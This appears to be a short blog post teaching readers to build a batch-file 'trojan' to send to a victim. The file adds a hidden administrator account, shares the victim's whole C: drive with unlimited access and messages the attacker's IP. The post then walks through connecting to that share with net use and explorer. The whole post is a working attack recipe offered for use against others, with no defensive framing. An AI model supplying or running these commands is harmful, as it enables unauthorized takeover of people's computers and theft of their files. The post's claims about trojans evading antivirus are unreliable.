Hacking Using Trojans


Hacking using Trojans _______________________________________________

Trozans are viruses that can be so simple that even antiviruses cant detect them U can use trozans to make your victim share their entire C: drive with you. Not only this, trozans can also tell you their opened port number and IP address.

Here is a simple yet effective way to create a trozan and let your victim share his C: drive (or system files drive) share with you.
The plan here is to share the C: drive and make a new user with administrators access

Step one -> Open a dos prompt and a notebook The dos prompt will help you to test if the commands are ok and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add What does this do? It makes a new user called neo you can put any name you want

Command n 2->
net localgroup administrators neo /add

This is the command that make your user go to the administrators group. Depending on the windows version the name will be different.

If you got an american version the name for the group is Administrators and for the portuguese version is administradores so it's nice yo know wich version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend.

-!Extras!-

Command n 4->
net send urip I am ur server

Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------: Client :----------------

Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user. First we need to make a session with the remote computer with the net use command , you will execute these commands from your dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim Of course where it says victimip you will insert the victim ip.

Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system which is the C: drive with administrators access!

Posted in Labels: |

0 comments: